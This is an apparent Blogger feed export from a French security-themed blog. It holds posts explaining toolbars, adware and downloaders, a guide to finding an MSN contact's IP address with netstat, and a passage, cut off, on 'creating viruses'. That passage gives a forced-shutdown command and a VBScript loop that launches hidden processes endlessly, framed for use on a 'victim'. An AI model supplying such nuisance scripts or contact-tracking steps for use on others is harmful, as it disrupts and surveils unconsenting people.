style="font-size:180%;color:#cc0000;"&gt;&lt;strong&gt;Toolbar&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#666666;"&gt;&lt;strong&gt;Barres d'outils (ToolsBar) :&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3366ff;"&gt;Comment coller au plus près de vos mots-clés et des urls visitées pour vous espionner. Les barres d'outils surveillent les habitudes d'utilisation d'Internet. Elles utilisent aussi l'identifiant du produit Windows pour identifier l'ordinateur sur un serveur distant.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#666666;"&gt;Description des barres d'outils (ToolBas) :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#3366ff;"&gt;&lt;strong&gt;Une barre d'outils est un groupe de boîtes de dialogues, boutons et autres accessoires qui s'ajoutent à votre navigateur. Rarement utiles et toujours avec des arrières pensés, leurs installations sont faites sans notre consentement. Elles pullulent actuellement et sont toujours implantées lors de visites sur des sites piégés qui sont rémunérés au nombre de barres installées. Leur but est de toujours être au plus près de vos habitudes de navigation, de vos Mots-clés et de vos favoris. L'une des plus célèbres barres est celle de Google qui, si elle ne se sert pas de pièges mais d'appâts pour vous inciter à aller la chercher et l'installer (elle n'est pas agressive), agit tout de même en spyware de tracking et profiling :&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc33cc;"&gt;&lt;em&gt;&lt;strong&gt;Elle surf sur son anti-popup pour justifier son installation dans IE (Internet Explorer) sinon, comme les autres, elle serait inutile et personne n'en voudrait&lt;/strong&gt;&lt;/em&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color:#cc33cc;"&gt;&lt;strong&gt;Google à trouvé un second "truc" pour que les Webmasters en parlent : elle est le seul moyen de connaître le PageRank (le fameux "indice de popularité") des pages Web d'un site, et donc de ses propres pages lorsque l'on est soi-même Webmaster. Dieu sait s'il y a du nombrilisme dans l'air chez les Webmasters.&lt;/strong&gt;&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3366ff;"&gt;Quel est l'intérêt des barres d'outils pour l'internaute ? Strictement aucun ! Tous les outils qu'elles prétendent apporter existent déjà à de rares petits plus près sans lesquels on vit très bien. Alors, où est l'intérêt ? A qui profite le crime ? Eh bien, à ceux qui ont écrit ces barres d'outils. Une fois encore, rien n'est gratuit sur le Net. Elles servent à capter vos déplacements sur le Net pour vous diriger vers des sites "amis" avec lesquels l'éditeur de la barre à des accords dit d'"affiliation". Il faut drainer le plus de monde possible dans le moins de temps possible vers des sites marchands et toucher des commissions au passage et tout est bon pour piéger l'internaute. La technologie et l'agressivité des barres est dans une spirales ascendante vertigineuse. Les outils d'éradication étant de plus en plus puissants, les implantations de barres sont de plus en plus sauvages, agressives, rapides, furtives difficiles à éradiquer. Certaines nécessitent le développement d'outils spécifiques car les anti-trojans standards n'y arrivent plus. Elles se métamorphosent toutes les semaines etc. ... Elles naissent comme des champignons dans une chaude lumière après la pluie.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3366ff;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-1786862672788918741?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/1786862672788918741/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/toolbar.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/1786862672788918741'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/1786862672788918741'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/toolbar.html' title='Toolbar'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-6330251182651306259</id><published>2008-11-10T08:02:00.000-08:00</published><updated>2009-03-06T08:11:14.658-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Adwares'/><title type='text'>Adwares</title><content type='html'>&lt;span style="font-size:180%;color:#cc0000;"&gt;&lt;strong&gt;Adwares&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#666666;"&gt;&lt;strong&gt;Les gestionnaires de publicités&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#339999;"&gt;Les Adwares (publiciels) sont des tâches chargées de gérer et afficher des publicités sur nos ordinateurs et sur les sites que nous visitons. Elles sont intrusives et désagréables par destination et malveillantes par nécessité (se comportent en &lt;span style="color:#000099;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/spyware.html" target="_blank"&gt;spywares&lt;/a&gt;&lt;/span&gt;).&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#666666;"&gt;Etymologie&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#339999;"&gt;Le mot Adware (Advertising software) vient d'une contraction de "Ads" (publicités en anglais) et "ware" qui désigne une classe de logiciels (freeware, shareware, payware etc. ...). Il existe des dizaines de classes inventées par des informaticiens ou des journalistes, dans la presse, les forums ou ailleurs :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#993399;"&gt;"&lt;span style="color:#000099;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/spyware.html" target="_blank"&gt;spywares&lt;/a&gt; &lt;/span&gt;" &lt;/span&gt;&lt;span style="color:#cc33cc;"&gt;pour la classe des logiciels espions&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#993399;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#cc33cc;"&gt;"shareware" pour la classe des logiciels distribués librement pour essais et que vous payez volontairement si vous décidez d'en poursuivre l'usage au-delà d'une période raisonnablement convenue (généralement 15 à 30 jours)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#993399;"&gt;&lt;span style="color:#cc33cc;"&gt;"freeware" pour la classe des logiciels totalement gratuits&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#339999;"&gt;Et aussi certaines classes totalement farfelues ou très imagées comme :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc33cc;"&gt;"suppositware" : logiciels de m... (de crotte)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc33cc;"&gt;"tupperware" : logiciels dont le fonctionnement ou le mode d'emploi sont particulièrement hermétiques.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#666666;"&gt;&lt;strong&gt;Définition&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#339999;"&gt;Il y a 2 définitions pour "adware"&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#3366ff;"&gt;Un adware est un programme qui dirige des publicités ciblées vers votre ordinateur, avec votre consentement initial pour cette tâche, ou sans votre consentement. L'adware est la partie installée sur les ordinateurs cibles d'un ensemble de moyens coopérant ensembles dont les autres parties sont les moyens logiciels d'une régie publicitaire et son réseau de serveurs appelés adservers.&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#3366ff;"&gt;Un adware est un "petit" utilitaire gratuit - un "freeware" ou "shareware" - supporté par un peu de publicité, c'est l'utilitaire lui-même qui est parfois appelé, par extension, un adware (une variante du freeware). C'est le cas, par exemple, de l'excellent 20/20, un programme de captures (copies) d'écrans gratuit. Son auteur en tire une rémunération par l'incrustation de bannières publicitaires gérées par un adware incorporé à 20/20. L'adware est donc alors un freeware dont le créateur conserve la propriété intellectuelle (copyright) et ne nous réclame pas de droit d'usage. En contrepartie, il perçoit une compensation monétaire en insérant un (ou des) bandeau(x) publicitaires dans son programme. Plusieurs de ces programmes n'ont pas besoin de fonctionner en ligne (c'est le cas de 20/20). Ils embarquent sur nos disques durs quelques bannières qui seront renouvelées lors de la prochaine mise à jour de logiciel. Toutefois lorsqu'il s'agit d'un "poids lourd" - un industriel du gratuit - avec toute une structure commerciale derrière - l'adware est bien la verrue (les composants logiciels), généralement parmi plusieurs, ajoutée à ce programme qui, lui, garde sa qualification de freeware. C'est le cas des Go!zilla, KazAa etc. ... A ce moment là, le freeware agit en trojan qui introduit, en nous le signalant parfois mais, le plus souvent à notre insu, des programmes de tierces parties dont les adwares.&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-6330251182651306259?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/6330251182651306259/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/adwares.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6330251182651306259'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6330251182651306259'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/adwares.html' title='Adwares'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-8816555981069619829</id><published>2008-11-10T07:48:00.000-08:00</published><updated>2009-03-06T08:24:42.735-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Downloader'/><title type='text'>Downloader</title><content type='html'>&lt;span style="font-size:180%;"&gt;&lt;strong&gt;&lt;span style="color:#990000;"&gt;Downloader&lt;/span&gt;&lt;/strong&gt; (Téléchargeur)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#339999;"&gt;Normalement, c'est un utilitaire dont le travail consiste à télécharger et, éventuellement, installer et enregistrer dans la base de registre, quelque chose. Implanté à votre insu, c'est un parasite qui va télécharger et installer d'autres parasites sur votre ordinateur, dans un système pyramidal.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#666666;"&gt;En tant que parasite et comme son nom l'indique, ce n'est pas un &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/cheval-de-troie-trojan.html" target="_blank"&gt;Trojan&lt;/a&gt; mais une classe de parasites. Comme il s'agit de programmes à part entière, ils peuvent avoir, simultanément, d'autres activités affichées et apparentes ou masquées et inconnues.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#339999;"&gt;&lt;strong&gt;Il existe plusieurs sortes de downloader. Contrairement aux &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/cheval-de-troie-trojan.html" target="_blank"&gt;Trojans&lt;/a&gt; (chevaux de Troie), au lieu d'embarquer la charge active avec eux, ils n'embarquent que les liens, généralement cryptés, stockés dans leur corps, des charges actives qu'ils ont le devoir de télécharger (downloader) et installer.&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;Ceci leur permet d'être plus petits et donc de "passer" plus facilement.&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;Ceci permet aussi de les modifier très facilement, tant au niveau des liens embarqués qu'au niveau de leurs propres signatures ce qui les rend plus furtifs.&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;Ceci permet enfin un mise à niveau aisée des parasites qu'ils ont la charges d'installer - ils peuvent, par exemple, être programmés pour aller régulièrement, à intervalles, chercher s'il existe une mise à jour du ou des parasites dont il a la charge.&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#666666;"&gt;Certains téléchargements, en apparences légitimes, se font par l'usage d'un downloader. Typiquement, une demande de téléchargement de KaZaA commence par le téléchargement d'un petit downloader qui prend en charge le téléchargement en lui-même. Il n'y a aucune raison valable à une telle pratique si ce n'est :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;espionner le contenu de nos ordinateurs et le matériel installé&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;installer d'autres choses en plus du produit convoité&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;inhiber, durant le téléchargement et l'installation, nos outils de surveillance&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#993399;"&gt;&lt;em&gt;assurer une installation "profonde" et / ou furtive que les installeurs classiques ne peuvent accomplir&lt;/em&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;installer un programme capable d'aller sur le Net pour télécharger du code inconnu sans nous en informer, sans que nous puissions nous y opposer et sans en connaître l'activité.&lt;/span&gt;&lt;/em&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-8816555981069619829?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/8816555981069619829/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/downloader.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/8816555981069619829'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/8816555981069619829'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/downloader.html' title='Downloader'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-6799537819794814634</id><published>2008-11-09T14:57:00.000-08:00</published><updated>2009-03-06T07:51:21.036-08:00</updated><title type='text'>Connection aux Cam Réseaux</title><content type='html'>&lt;div align="center"&gt;&lt;span style="font-size:130%;color:#3333ff;"&gt;&lt;strong&gt;&lt;em&gt;Voici la nouvelle télé-réalité grandeur nature, et oui il est tout à fait possible de se connecter aux caméras de nos rues, écoles, halls, églises, cafés, rétaurants, usines, bref...La liste est longue mais peut-on et doit-on l'empêcher?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/aeBl96ZUNDc&amp;amp;hl=fr&amp;amp;fs=1&amp;amp;rel=0&amp;amp;color1=0x006699&amp;amp;color2=0x54abd6"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/aeBl96ZUNDc&amp;hl=fr&amp;fs=1&amp;rel=0&amp;color1=0x006699&amp;color2=0x54abd6" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-6799537819794814634?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/6799537819794814634/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/connection-aux-cam-reseaux.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6799537819794814634'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6799537819794814634'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/connection-aux-cam-reseaux.html' title='Connection aux Cam Réseaux'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4916056598880870544</id><published>2008-11-09T14:09:00.000-08:00</published><updated>2009-03-06T07:54:24.565-08:00</updated><title type='text'>IP de vos contacts MSN</title><content type='html'>&lt;strong&gt;Comment obtenir &lt;span style="color:#ff0000;"&gt;l'adresse IP&lt;/span&gt; d'un de vos contacts sur &lt;span style="color:#000099;"&gt;MSN&lt;/span&gt;. Tout est ici.Il existe une commande MS-DOS qui permet de recenser les &lt;span style="color:#ff0000;"&gt;adresses IP&lt;/span&gt; des ordinateurs ayant une connexion directe avec votre PC. Cette commande c'est &lt;span style="color:#3366ff;"&gt;netstat -n&lt;/span&gt;.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#666666;"&gt;Pour exécuter cette commande, il faut se rendre dans le menu &lt;em&gt;&lt;span style="color:#006600;"&gt;Démarrer&lt;/span&gt;&lt;/em&gt; puis &lt;em&gt;&lt;span style="color:#006600;"&gt;Tous les programmes&lt;/span&gt;&lt;/em&gt;&gt;&lt;em&gt;&lt;span style="color:#006600;"&gt;Accessoires&lt;/span&gt;&lt;/em&gt;&gt;&lt;em&gt;&lt;span style="color:#006600;"&gt;Invite de commandes&lt;/span&gt;&lt;/em&gt; puis de taper &lt;span style="color:#3366ff;"&gt;netstat&lt;/span&gt; et enfin Entrer. &lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Mais le problème avec &lt;span style="color:#000099;"&gt;MSN&lt;/span&gt; c'est que toutes vos conversations textuelles passent par un serveur &lt;span style="color:#000099;"&gt;MSN&lt;/span&gt; auquel vous êtes connecté, si vous utilisez la commande &lt;span style="color:#3366ff;"&gt;netstat -n&lt;/span&gt; vous obtiendrez alors &lt;span style="color:#ff0000;"&gt;l'adresse IP&lt;/span&gt; du serveur &lt;span style="color:#000099;"&gt;MSN&lt;/span&gt; et non celle de votre correspondant. Attention, je vous conseille de fermer tous vos logiciels de type P2P avant l'utilisation de cette commande car sinon vous obtiendrez plusieurs dizaines d'&lt;span style="color:#ff0000;"&gt;adresses IP&lt;/span&gt;. &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#666666;"&gt;Pour obtenir &lt;span style="color:#ff0000;"&gt;l'adresse IP&lt;/span&gt; de votre correspondant, il faut simplement que vous ayez une connection directe avec lui comme un échange de fichiers en cours (téléchargement via &lt;span style="color:#000099;"&gt;MSN&lt;/span&gt;). Allez ensuite dans l'Invite de commandes, tapez &lt;span style="color:#3366ff;"&gt;netstat -n&lt;/span&gt; et vous obtiendrez&lt;/span&gt;&lt;span style="color:#ff0000;"&gt; l'adresse IP&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4916056598880870544?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4916056598880870544/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/ip-de-vos-contacts-msn.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4916056598880870544'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4916056598880870544'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/ip-de-vos-contacts-msn.html' title='IP de vos contacts MSN'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4972328078927544838</id><published>2008-11-09T13:21:00.000-08:00</published><updated>2009-03-06T07:55:09.371-08:00</updated><title type='text'>Virus création et compréhension</title><content type='html'>&lt;div align="center"&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;&lt;strong&gt;&lt;em&gt;Je tiens à signaler que le texte ci-dessous et dans le seul but de vous informer sur le fonctionnement d'un virus&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_f87oXEJfKnY/SSf1xHwy6SI/AAAAAAAABHg/DZhMWFAVXgk/s1600-h/Copie+de+photodl_101721%5B1%5D.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5271452113106561314" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; WIDTH: 199px; CURSOR: hand; HEIGHT: 200px" alt="" src="http://4.bp.blogspot.com/_f87oXEJfKnY/SSf1xHwy6SI/AAAAAAAABHg/DZhMWFAVXgk/s200/Copie+de+photodl_101721%5B1%5D.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_f87oXEJfKnY/SSf1xHwy6SI/AAAAAAAABHg/DZhMWFAVXgk/s1600-h/Copie+de+photodl_101721%5B1%5D.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_f87oXEJfKnY/SSf1xHwy6SI/AAAAAAAABHg/DZhMWFAVXgk/s1600-h/Copie+de+photodl_101721%5B1%5D.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_f87oXEJfKnY/SSf1xHwy6SI/AAAAAAAABHg/DZhMWFAVXgk/s1600-h/Copie+de+photodl_101721%5B1%5D.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_f87oXEJfKnY/SSf1xHwy6SI/AAAAAAAABHg/DZhMWFAVXgk/s1600-h/Copie+de+photodl_101721%5B1%5D.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_f87oXEJfKnY/SSf1xHwy6SI/AAAAAAAABHg/DZhMWFAVXgk/s1600-h/Copie+de+photodl_101721%5B1%5D.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Tout d'abord nous allons créer quelques petits virus (bat et vbs) afin de mieux les comprendre&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Ce n'est pas plus compliqué que ca&lt;br /&gt;Ouvrez votre bloc-notes (notepad)&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Tapez ceci dans le notepad:&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;%windir%\system32\shutdown.exe -s -t 60 -c "VIRUS"&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#3333ff;"&gt;Vous pouvez remplacer le "60" par n'importe quel nombre et "VIRUS" par n'importe quel motDès que vous l'avez écrit dans le notpad vous devez l'enregistre suivi de l'extension .vbsex:: monvirus.vbs&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#000066;"&gt;Un autre un peu plus méchant&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Set variable = CreateObject("WScript.Shell") &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Do &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;variable.run "notepad",&lt;span style="color:#ff0000;"&gt;false&lt;/span&gt; &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#009900;"&gt;Loop&lt;/span&gt; &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#3333ff;"&gt;la c'est pareil, enregistrez le avec l'extansion .vbs (toujours)On peut remplacer "notepad" par n'importe quelle action néfaste souhaitée. &lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;FALSE&lt;/span&gt;:signifie que la victime ne verra pas ce qui s'affiche à l'écran.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#009900;"&gt;LOOP&lt;/span&gt;: veut dire que l'action doit se faire en boucle.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#000099;"&gt;Les Virus en .batch&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;&lt;em&gt;Le batch est un language informatique qui sert à soumetre des actions (comme les fichiers .exe) au PC.&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#666666;"&gt;Voici un petit virus&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br 